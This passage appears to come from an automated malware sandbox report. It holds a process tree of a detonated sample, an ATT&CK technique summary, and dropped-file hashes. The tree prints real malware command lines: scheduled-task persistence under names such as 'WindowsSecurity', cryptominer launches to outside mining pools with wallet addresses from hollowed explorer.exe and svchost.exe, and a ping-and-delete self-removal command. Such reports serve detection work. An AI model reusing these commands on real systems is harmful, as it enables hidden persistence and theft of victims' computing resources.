                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                              PID:2544
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Red1_.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Red1_.exe"
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                PID:5564
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Clip_.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Clip_.exe"
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                PID:8036
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:8608
                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:6636
                                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                        schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                        PID:2516
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                      PID:7144
                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                        PID:2516
                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                          PID:9640
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                          PID:9920
                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                          C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=antivirus.windowsdefenderautoupdater.me:3333 --user=4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQuiWzFUXCscKHeTzpD --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=90 --nicehash --cinit-stealth
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:6736
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:3544
                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:8940
                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                PID:8128
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\VideoDriver.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\VideoDriver.exe"
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:7280
                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:2776
                                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'
                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                      PID:7148
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                    PID:6668
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                PID:6256
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\2B1D.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\2B1D.exe"
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:7152
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                  ping 1.1.1.1 -n 1 -w 100
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                  PID:8704
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                  ping 1.1.1.1 -n 1 -w 900
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                  PID:9264
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:9328
                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:2260
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:10188
                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:5732
                                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                                      PID:5656
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                        PID:9824
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:9228
                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:204
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\qbwuapv\yhtzjeaq.exe
                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\qbwuapv\yhtzjeaq.exe /d"C:\Users\Admin\AppData\Local\Temp\C74D.exe"
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                          PID:4356
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                            svchost.exe
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                            PID:5560
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                              svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:6240
                                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:8356
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:6280
                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:2212
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:3748
                                                                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                    PID:8904
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                      DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7094c1b3-671f-2c42-8f2d-cf062e27b528}\oemvista.inf" "9" "4d14a44ff" "000000000000016C" "WinSta0\Default" "000000000000017C" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                      PID:2288
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                      DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000140"
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                      PID:8900
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                    PID:7864
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                      PID:10080
                                                                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:10220
                                                                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                      PID:8948
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:9308
                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                        PID:1384
                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                          MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                          PID:8996
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3589.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\3589.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                        PID:7680
                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                        PID:656
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:1880
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:11240

                                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                          Execution

                                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                                          Persistence

                                                                                                                                                                                                                                                                                          Modify Existing Service

                                                                                                                                                                                                                                                                                          2
                                                                                                                                                                                                                                                                                          T1031

                                                                                                                                                                                                                                                                                          New Service

                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                          T1050

                                                                                                                                                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                          2
                                                                                                                                                                                                                                                                                          T1060

                                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                                          Privilege Escalation

                                                                                                                                                                                                                                                                                          New Service

                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                          T1050

                                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                                          Defense Evasion

                                                                                                                                                                                                                                                                                          Modify Registry

                                                                                                                                                                                                                                                                                          5
                                                                                                                                                                                                                                                                                          T1112

                                                                                                                                                                                                                                                                                          Disabling Security Tools

                                                                                                                                                                                                                                                                                          2
                                                                                                                                                                                                                                                                                          T1089

                                                                                                                                                                                                                                                                                          File Deletion

                                                                                                                                                                                                                                                                                          2
                                                                                                                                                                                                                                                                                          T1107

                                                                                                                                                                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                          T1497

                                                                                                                                                                                                                                                                                          Install Root Certificate

                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                          T1130

                                                                                                                                                                                                                                                                                          Credential Access

                                                                                                                                                                                                                                                                                          Credentials in Files

                                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                                          T1081

                                                                                                                                                                                                                                                                                          Discovery

                                                                                                                                                                                                                                                                                          Software Discovery

                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                          T1518

                                                                                                                                                                                                                                                                                          Query Registry

                                                                                                                                                                                                                                                                                          7
                                                                                                                                                                                                                                                                                          T1012

                                                                                                                                                                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                          T1497

                                                                                                                                                                                                                                                                                          System Information Discovery

                                                                                                                                                                                                                                                                                          7
                                                                                                                                                                                                                                                                                          T1082

                                                                                                                                                                                                                                                                                          Peripheral Device Discovery

                                                                                                                                                                                                                                                                                          2
                                                                                                                                                                                                                                                                                          T1120

                                                                                                                                                                                                                                                                                          Remote System Discovery

                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                          T1018

                                                                                                                                                                                                                                                                                          Collection

                                                                                                                                                                                                                                                                                          Data from Local System

                                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                                          T1005

                                                                                                                                                                                                                                                                                          Command and Control

                                                                                                                                                                                                                                                                                          Web Service

                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                          T1102

                                                                                                                                                                                                                                                                                          Impact

                                                                                                                                                                                                                                                                                          Inhibit System Recovery

                                                                                                                                                                                                                                                                                          2
                                                                                                                                                                                                                                                                                          T1490

                                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            1c494825e5979add62914cfd05ce1821

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            b9070a59fc9dfcf6fc9bda98bda26b780e364d3d

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            d5a41fff5b0a0b3a0b02d046be48f3e254ecf9bcb9ba265aad29d57188596768

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            750b2ffc1ce7ecb108f2f48aea9581250816360aa94691f758e15af20e518f727dc77ae94b3703752f6657ad9f82ca55e5140518dbcb84c00f29830482762f77

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            137ce4f62737203f156810746d136ec3

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            c4f8f724fd3b41d95b6ce8c5dbde92b2792c90c4

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            35b65f6c46e21ee4eb4cf5d861d699396dcdc445eb75f904d9a2fbd0ad298575

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            bb2e3257f782f061e934bc1549369c92d2d80d82489d3f6507101493a4ebab930efb6187546bc24f6b67555efdda1738462a60ca2c1cef32d50dbcdb9f30c52e

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\55CSt7QvFaXOtj9wKAVdX3Ex.exe.log
                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            5b50852bf977f644bcd5997b7b5883c1

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            8b53694b796620422b366dc5b8dbb3ce3060473c

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            667bc8c8d53eddf6355877344b669db4fb9762e6320afc7316c3786213a254a9

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            7e794fa7de5eca585000ef840ca821f36205d25b389747339d8b8d58b1ef3cd16306e62288f86027cbe6a76eeccc9dc7634a11c94ba551f3ce42ee874fac712d

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-NA9QA.tmp\WSLPIDqG5PyYGNx82zzOUOno.tmp
                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            ffcf263a020aa7794015af0edee5df0b

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            bce1eb5f0efb2c83f416b1782ea07c776666fdab

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\6455747.exe
                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            883fe31989c8dfc8f2e22a94ae2d369a

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            2933d6fafbebe84c12c0e226bf182e708d3bd32e

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            7781a758350e3fba94c86661171371a7fd19f0801bf4cc82c5c94169fed3b9b4

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            c9d4ee4ba7e34c4641b25837295a8d7ea6c04f5d25facd9948bb19698e75a833e16f530d6be59fe6cb9d2c5771a1e7e10266adbb121ce1822e1048530e67e313

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\6734678.exe
                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            3598180fddc06dbd304b76627143b01d

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            1d39b0dd8425359ed94e606cb04f9c5e49ed1899

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\6734678.exe
                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            3598180fddc06dbd304b76627143b01d

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            1d39b0dd8425359ed94e606cb04f9c5e49ed1899

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\8784535.exe
                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            724252e8cc86d50db3dd965a744188c0

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            4f96e366267aa778d2f6b11bc35e5aca518a6c30

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            786bcc1e15c4c6c7a37ac4908c5991d5589b6d04c74070c0f083287fc74782ff

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            3443a8230f77555e1c101a6b9a91d6695a45ff1cc5a503cb14ba0b87cefc8a58ab7e3d96df344f2df043fd285bc235e81dae51a8c6317d9262c519f945dd7a91

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\8784535.exe
                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            724252e8cc86d50db3dd965a744188c0

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            4f96e366267aa778d2f6b11bc35e5aca518a6c30

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            786bcc1e15c4c6c7a37ac4908c5991d5589b6d04c74070c0f083287fc74782ff

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            3443a8230f77555e1c101a6b9a91d6695a45ff1cc5a503cb14ba0b87cefc8a58ab7e3d96df344f2df043fd285bc235e81dae51a8c6317d9262c519f945dd7a91

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\34qKnz8Mn84B8wq6168Hdh3Z.exe
                                                                                                                                                                                                                                                                                            MD5

